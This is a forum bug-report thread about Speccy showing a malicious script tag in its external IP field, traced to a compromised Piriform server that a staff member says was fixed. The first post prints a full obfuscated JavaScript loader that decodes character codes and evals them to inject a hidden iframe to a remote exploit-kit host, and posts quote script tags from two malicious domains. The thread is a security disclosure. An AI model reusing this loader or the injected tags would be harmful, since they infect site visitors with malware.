Speccy querying a hacked page

Speccy Speccy Bug Reporting
1

While perusing the latest version of Speccy (1.10.248), I noticed something odd under Network.

"External IP Address <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx'>http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx

with the ending x's being the rest of my public IP.

speccyi.png

I didn't have a clue what this was, so I blindly copied the address (hxxp://www.nsa-lab.com/js.php < intentionally delinkified for this post) into Google Chrome to try and figure out what was going on.

When I do that, I get this:

avastu.png

The javascript is:

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,ring.fromCharCode)');var R=null;var h=document.styleSheets;var F = null;for(var f=0; f < h.length; f++){try{var Z = h[f].cssRules || h[f].rules;for(var m=0;m < Z.length; m++){var Q = Z.item ? Z.item(m) : Z[m];if(Q.selectorText!='#va')continue;x = (Q.cssText) ? Q.cssText : Q.style.cssText;R = "St" + x.match(/(ri[^")]+)/)[1]; F=Q.selectorText.substr(1);};} catch(e){};}L=new Date(2020,11,3,2,21,8);i=L.getSeconds()-4;var o=[i+114,i+93,i+110,i+28,i+61,i+57,i+30,i+94,i+107,i+96,i+117,i+30,i+55,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+97,i+104,i+111,i+97,i+28,i+119,i+114,i+93,i+110,i+28,i+67,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+61,i+37,i+55,i+112,i+110,i+117,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+67,i+37,i+55,i+121,i+28,i+95,i+93,i+112,i+95,i+100,i+28,i+36,i+97,i+37,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+94,i+107,i+96,i+117,i+28,i+57,i+28,i+67,i+55,i+121,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+28,i+97,i+104,i+111,i+97,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+115,i+110,i+101,i+112,i+97,i+36,i+30,i+56,i+101,i+98,i+110,i+93,i+105,i+97,i+28,i+111,i+110,i+95,i+57,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+28,i+115,i+101,i+96,i+112,i+100,i+57,i+35,i+45,i+44,i+35,i+28,i+100,i+97,i+101,i+99,i+100,i+112,i+57,i+35,i+45,i+44,i+35,i+28,i+111,i+112,i+117,i+104,i+97,i+57,i+35,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+54,i+100,i+101,i+96,i+96,i+97,i+106,i+55,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+54,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+55,i+104,i+97,i+98,i+112,i+54,i+44,i+55,i+112,i+107,i+108,i+54,i+44,i+55,i+35,i+58,i+56,i+43,i+101,i+98,i+110,i+93,i+105,i+97,i+58,i+30,i+37,i+55,i+121,i+121,i+114,i+93,i+110,i+28,i+68,i+57,i+44,i+55,i+98,i+113,i+106,i+95,i+112,i+101,i+107,i+106,i+28,i+97,i+36,i+37,i+119,i+115,i+100,i+101,i+104,i+97,i+36,i+68,i+39,i+39,i+28,i+56,i+28,i+45,i+44,i+44,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+114,i+93,i+110,i+28,i+111,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+35,i+101,i+98,i+110,i+93,i+105,i+97,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+111,i+110,i+95,i+35,i+40,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+57,i+35,i+100,i+101,i+96,i+96,i+97,i+106,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+57,i+35,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+104,i+97,i+98,i+112,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+112,i+107,i+108,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+115,i+101,i+96,i+112,i+100,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+100,i+97,i+101,i+99,i+100,i+112,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+111,i+37,i+55,i+121];b=eval("e" + F + "l");var D='';J=b®;for(var f=0; f < o.length; f++){O=b(o[f]);D+=J(O);}b(D);

Posted about it on the Staff forums at BleepingComputer.com, and Grinler (Lawrence Abrams) posted this:

Basically whats happening is that speccy is querying your ip address by going to this url:

http://speccy.piriform.com/ip/

The content being returned, though, is not only the ip address but a javascript.

<script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>

Speccy is 100% compromised. That javascript loads a exploit kit, which has now downloaded some malware onto my Virtual Machine.

Pretty sure this would be considered a critical security flaw.

-kN

2

/me gets the same as the above screeny of specccy.

3

Also,

I can see how this would affect people. If you save your report as XML and then load it, it will open Internet Explorer (or your other default browser) automatically and load the XML file. This will trigger the javascript to launch and boom you are infected.

4

Thanks everyone for bringing this to the attention of Piriform.

I have send a mass PM out to alert Piriform so hopefully this can be taken care of right away.

5

Thanks, SpySentinel. :)

6

cheers.

7

The Publish Snapshot is also affected.

<script type="text/javascript" src="http://arent.xip.pl/js.php"></script>http://speccy.piriform.com/results/FmdnvYm6byY0qjs3QKp8w8D

Visiting a Snapshot link gives another blocked Trojan:

snapshotr.png

8

Problem has been fixed. We're currently performing a full investigation into that server.

Please note that the software is fine and doesn't contain a virus, it's a fault on our Speccy server.

9

Thanks, MrG.

I'm curious to know how this happened...